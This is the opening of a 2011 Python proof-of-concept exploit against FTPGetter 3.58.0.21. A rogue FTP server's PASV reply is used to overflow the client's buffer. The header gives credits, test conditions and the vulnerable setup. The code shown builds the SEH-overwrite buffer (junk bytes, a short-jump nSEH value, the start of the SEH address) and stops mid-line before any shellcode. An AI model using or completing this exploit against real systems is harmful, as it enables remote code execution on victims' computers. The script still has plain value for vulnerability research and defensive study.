#!/usr/bin/python # Exploit Title: FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit # Date: 02/03/2011 # Author: modpr0be # Software Link: http://www.ftpgetter.com/ftpgetter_setup.exe # Vulnerable version: <= 3.58.0.21 # Tested on: Windows XP SP3 (VMware Player 3.1.3 build-324285) # CVE : N/A # ====================================================================== # ___ _ __ __ __ _ __ # ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _ # / __ / / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __ / __ \/ __ `/ # / /_/ / / /_/ / / /_/ /_/ / / / __/ /__/ / / / / /_/ / / / / /_/ / # \__,_/_/\__, /_/\__/\__,_/_/ \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/ # /____/ http://www.digital-echidna.org # ====================================================================== # # Greetz: # say hello to all digital-echidna org crew: # otoy, cipherstring, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix # special thx: # otoy, cipherstring, cyb3r.anbu, oebaj. # help for documentation: # offsec, exploit-db, corelan-team, 5M7X, loneferret. # #### Software description: # Save time on FTP/SFTP updates! Plan your uploads and automate the workflow. # Schedule and automate file transfers with a centralized console. Let your # computer move or synchronize information securely between home and office # automatically according to the schedule! # #### Exploit information: # There was an error when sending a response to the PASV command. # Fortunately, these errors lead to buffer overflows. # This exploit is unstable. It should only be used as a POC. # I tried several times on various systems, # the buffer sometimes changed. # ### Some Conditions: # This POC is using "the most selling feature" Automated FTP Request. # So this POC, I use Auto Download with / as the Source Files. # Scheduler Settings also set to Repetitive. # Make sure to run the program first before this POC. # #### Other information: # It's a part of "Death of an FTP Client" :) # For more information, loot at here: # http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ # ## from socket import * import struct import time total = 1000 junk1 = "\x41" * 485 nseh = "\xeb\x06\x90\x90" seh = struct.pack('